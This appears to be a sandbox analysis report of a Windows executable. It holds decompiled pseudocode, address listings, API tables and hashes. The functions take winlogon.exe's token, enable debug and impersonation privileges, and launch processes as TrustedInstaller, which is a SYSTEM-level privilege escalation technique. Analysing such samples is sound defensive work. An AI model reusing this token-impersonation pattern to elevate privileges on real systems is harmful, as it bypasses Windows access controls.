                                                                                                                0x0040862a
                                                                                                                0x00408632
                                                                                                                0x00408633
                                                                                                                0x00408638
                                                                                                                0x0040864f
                                                                                                                0x00408651
                                                                                                                0x00000000
                                                                                                                0x0040854f
                                                                                                                0x0040854f
                                                                                                                0x00408550
                                                                                                                0x00408556
                                                                                                                0x00408556

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                  • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                  • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                  • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                • swscanf.MSVCRT ref: 00408620
                                                                                                                • _wtoi.MSVCRT ref: 00408633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                • API String ID: 3933224404-3784219877
                                                                                                                • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                0x00401fe6
                                                                                                                0x00401ff1
                                                                                                                0x00401ff3
                                                                                                                0x00401fff
                                                                                                                0x00402002
                                                                                                                0x004020a8
                                                                                                                0x004020ab
                                                                                                                0x004020f3
                                                                                                                0x004020f6
                                                                                                                0x00402162
                                                                                                                0x00402165
                                                                                                                0x004021f2
                                                                                                                0x004021f5
                                                                                                                0x00402235
                                                                                                                0x00402238
                                                                                                                0x004022be
                                                                                                                0x0040223a
                                                                                                                0x0040223a
                                                                                                                0x00402240
                                                                                                                0x0040224b
                                                                                                                0x0040224e
                                                                                                                0x00402251
                                                                                                                0x00402254
                                                                                                                0x00402259
                                                                                                                0x0040225e
                                                                                                                0x00402262
                                                                                                                0x00402264
                                                                                                                0x00402264
                                                                                                                0x00402264
                                                                                                                0x00402262
                                                                                                                0x00402266
                                                                                                                0x0040226c
                                                                                                                0x00402271
                                                                                                                0x00402274
                                                                                                                0x00402276
                                                                                                                0x0040229a
                                                                                                                0x0040229a
                                                                                                                0x00402278
                                                                                                                0x00402296
                                                                                                                0x00402296
                                                                                                                0x0040229c
                                                                                                                0x0040229c
                                                                                                                0x004022c0
                                                                                                                0x004022c2
                                                                                                                0x004022c8
                                                                                                                0x004022c8
                                                                                                                0x004022c8
                                                                                                                0x00000000
                                                                                                                0x004022c0
                                                                                                                0x00402201
                                                                                                                0x00402203
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402220
                                                                                                                0x00402225
                                                                                                                0x00402227
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040222d
                                                                                                                0x00000000
                                                                                                                0x0040222d
                                                                                                                0x00402173
                                                                                                                0x00402179
                                                                                                                0x0040217b
                                                                                                                0x0040217e
                                                                                                                0x00402183
                                                                                                                0x00402185
                                                                                                                0x00402188
                                                                                                                0x0040218d
                                                                                                                0x0040218f
                                                                                                                0x00402192
                                                                                                                0x004021a2
                                                                                                                0x004021a7
                                                                                                                0x004021a9
                                                                                                                0x004021ac
                                                                                                                0x004021cc
                                                                                                                0x004021d1
                                                                                                                0x004021d3
                                                                                                                0x004021db
                                                                                                                0x004021db
                                                                                                                0x004021e1
                                                                                                                0x004021e1
                                                                                                                0x004021e7
                                                                                                                0x004021e7
                                                                                                                0x00000000
                                                                                                                0x00402192
                                                                                                                0x004020fe
                                                                                                                0x00402103
                                                                                                                0x00402105
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402111
                                                                                                                0x00402114
                                                                                                                0x00000000
                                                                                                                0x00402114
                                                                                                                0x004020ad
                                                                                                                0x004020b4
                                                                                                                0x004020b9
                                                                                                                0x004020bc
                                                                                                                0x00000000
                                                                                                                0x004020c2
                                                                                                                0x004020c4
                                                                                                                0x004020ce
                                                                                                                0x004020d0
                                                                                                                0x004020d3
                                                                                                                0x004020d4
                                                                                                                0x004020d5
                                                                                                                0x004020e6
                                                                                                                0x004020e7
                                                                                                                0x004020d7
                                                                                                                0x004020d7
                                                                                                                0x004020dd
                                                                                                                0x004020de
                                                                                                                0x004020df
                                                                                                                0x004020df
                                                                                                                0x004020ec
                                                                                                                0x004020ef
                                                                                                                0x00000000
                                                                                                                0x004020ef
                                                                                                                0x00402008
                                                                                                                0x00402016
                                                                                                                0x0040201d
                                                                                                                0x0040202e
                                                                                                                0x00402035
                                                                                                                0x00402044
                                                                                                                0x00402049
                                                                                                                0x00402055
                                                                                                                0x00402064
                                                                                                                0x00402068
                                                                                                                0x0040206e
                                                                                                                0x0040208b
                                                                                                                0x00402070
                                                                                                                0x00402082
                                                                                                                0x00402088
                                                                                                                0x0040209e
                                                                                                                0x004020a1
                                                                                                                0x00402119
                                                                                                                0x00402119
                                                                                                                0x0040211b
                                                                                                                0x0040211e
                                                                                                                0x0040211e
                                                                                                                0x00402149
                                                                                                                0x00402151
                                                                                                                0x00402151
                                                                                                                0x00402157
                                                                                                                0x00402157
                                                                                                                0x004022cb
                                                                                                                0x004022d2
                                                                                                                0x004022d2

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040201D
                                                                                                                • memset.MSVCRT ref: 00402035
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00402050
                                                                                                                • wcslen.MSVCRT ref: 0040205F
                                                                                                                • wcslen.MSVCRT ref: 004020B4
                                                                                                                • _wtoi.MSVCRT ref: 004020D7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                  • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                  • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                  • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                  • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                  • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                • wcschr.MSVCRT ref: 00402259
                                                                                                                • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                • API String ID: 3201562063-2355939583
                                                                                                                • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                0x00409924
                                                                                                                0x0040992c
                                                                                                                0x00409937
                                                                                                                0x0040993f
                                                                                                                0x0040994a
                                                                                                                0x00409956
                                                                                                                0x00409962
                                                                                                                0x0040996e
                                                                                                                0x00409971
                                                                                                                0x00409973
                                                                                                                0x00000000
                                                                                                                0x00409976
                                                                                                                0x00409977

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1529661771-70141382
                                                                                                                • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                0x00401f04
                                                                                                                0x00401f20
                                                                                                                0x00401f27
                                                                                                                0x00401f38
                                                                                                                0x00401f3f
                                                                                                                0x00401f4e
                                                                                                                0x00401f54
                                                                                                                0x00401f5f
                                                                                                                0x00401f6e
                                                                                                                0x00401f72
                                                                                                                0x00401f77
                                                                                                                0x00401f78
                                                                                                                0x00401f91
                                                                                                                0x00401f7a
                                                                                                                0x00401f88
                                                                                                                0x00401f8e
                                                                                                                0x00401f8e
                                                                                                                0x00401fa6
                                                                                                                0x00401fa9
                                                                                                                0x00401fae
                                                                                                                0x00401fb0
                                                                                                                0x00401fb2
                                                                                                                0x00401fb9
                                                                                                                0x00401fc2
                                                                                                                0x00401fca
                                                                                                                0x00401fd2
                                                                                                                0x00401fd2
                                                                                                                0x00401fd7
                                                                                                                0x00401fd7
                                                                                                                0x00401fe3

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401F27
                                                                                                                • memset.MSVCRT ref: 00401F3F
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00401F5A
                                                                                                                • wcslen.MSVCRT ref: 00401F69
                                                                                                                • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                • API String ID: 3867304300-2177360481
                                                                                                                • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                0x0040955f
                                                                                                                0x00409566
                                                                                                                0x0040956e
                                                                                                                0x00409576
                                                                                                                0x00409586
                                                                                                                0x00409586
                                                                                                                0x0040956e
                                                                                                                0x00409592
                                                                                                                0x004095aa
                                                                                                                0x00409594
                                                                                                                0x004095a3
                                                                                                                0x004095a6
                                                                                                                0x004095a6

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                                                                0x00402f3a
                                                                                                                0x00402f51
                                                                                                                0x00402f60
                                                                                                                0x00402f6f
                                                                                                                0x00402f78
                                                                                                                0x00402f7a
                                                                                                                0x00402f7a
                                                                                                                0x00402f8a
                                                                                                                0x00402f8f
                                                                                                                0x00402f94
                                                                                                                0x00402f99
                                                                                                                0x00402f9e
                                                                                                                0x00402f9f
                                                                                                                0x00402fad
